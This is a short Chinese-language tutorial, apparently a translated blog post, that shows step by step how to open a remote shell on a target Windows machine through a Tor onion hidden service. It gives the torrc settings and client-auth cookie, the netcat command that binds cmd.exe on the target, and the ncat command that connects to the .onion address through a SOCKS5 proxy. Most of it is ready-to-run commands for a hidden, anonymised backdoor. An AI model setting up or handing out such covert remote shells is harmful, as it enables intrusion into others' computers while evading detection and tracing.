在這篇文章中，我將跟大家分享我的一個(gè)小發(fā)現(xiàn)，即如何在Windows平臺(tái)中通過(guò)Tor Onion服務(wù)來(lái)開(kāi)啟遠(yuǎn)程Shell 。接下來(lái)，話不多說(shuō)，我們直奔主題。

操作方法

首先，我們要在一個(gè)Windows Tor客戶端中創(chuàng)建一個(gè)Tor onion服務(wù)(即隱藏服務(wù))。我下載了Tor Expert bundle(同樣適用于Tor瀏覽器)-【下載地址】。

然后使用下列命令創(chuàng)建Tor配置文件torrc：

HiddenServiceDir C:demoTorservice HiddenServicePort 8662 127.0.0.1:12345

開(kāi)啟Tor服務(wù)之后，將會(huì)自動(dòng)創(chuàng)建目錄C:demoTorService，并填充一系列必要的文件(<主機(jī)名>文件夾包含了這個(gè)Toronion服務(wù)的.onion地址)。

該onion服務(wù)將監(jiān)聽(tīng)端口8662，而流量將會(huì)直接轉(zhuǎn)發(fā)到127.0.0.1(端口12345)。

這里我們還可以給服務(wù)開(kāi)啟客戶端驗(yàn)證功能，因?yàn)槿绻婚_(kāi)啟這個(gè)功能的話，任何知道這個(gè).onion地址和端口號(hào)的人都可以進(jìn)行連接。最基礎(chǔ)的客戶端驗(yàn)證使用了共享密鑰，你可以使用下列命令進(jìn)行配置(torrc)：

HiddenServiceAuthorizeClient basic testuser

這里我選擇使用testuser作為客戶端名稱：

接下來(lái)，我們可以使用配置文件torrc來(lái)開(kāi)啟Tor：

tor.exe -f torrc

.onion地址以及客戶端驗(yàn)證cookie可以在service目錄的<主機(jī)名>文件夾中找到：

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

當(dāng)然了，你一定要保護(hù)認(rèn)證cookie密鑰的安全。

現(xiàn)在，用nc.exe在目標(biāo)Windows設(shè)備上開(kāi)啟服務(wù)(我?guī)啄昵熬驮陔娔X上下載了nc.exe，我不記得原始的URL地址了，我使用的版本是v1.11，MD5為ab41b1e2db77cebd9e2779110ee3915d)：

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor ExpertBundle以及nc.exe不需要任何其他的依賴組件(跟DLL類似)，因此任意用戶都可以直接運(yùn)行。

現(xiàn)在我們的目標(biāo)主機(jī)已經(jīng)配置好了，在另一臺(tái)設(shè)備上，我需要使用包含了認(rèn)證cookie的配置文件來(lái)開(kāi)啟Tor服務(wù)：

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

接下來(lái)，我們需要運(yùn)行ncat，因?yàn)閚cat.exe支持socks5代理(nc.exe不支持)：

ncat.exe –proxy 127.0.0.1:9050 –proxy-type socks5 nybjuivgocveiyeq.onion 8662

接下來(lái)，我們就得到遠(yuǎn)程Shell啦!

提醒大家一下，這種方法不適用于ncat v 7.60版本，具體原因請(qǐng)參考【這里】：

ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.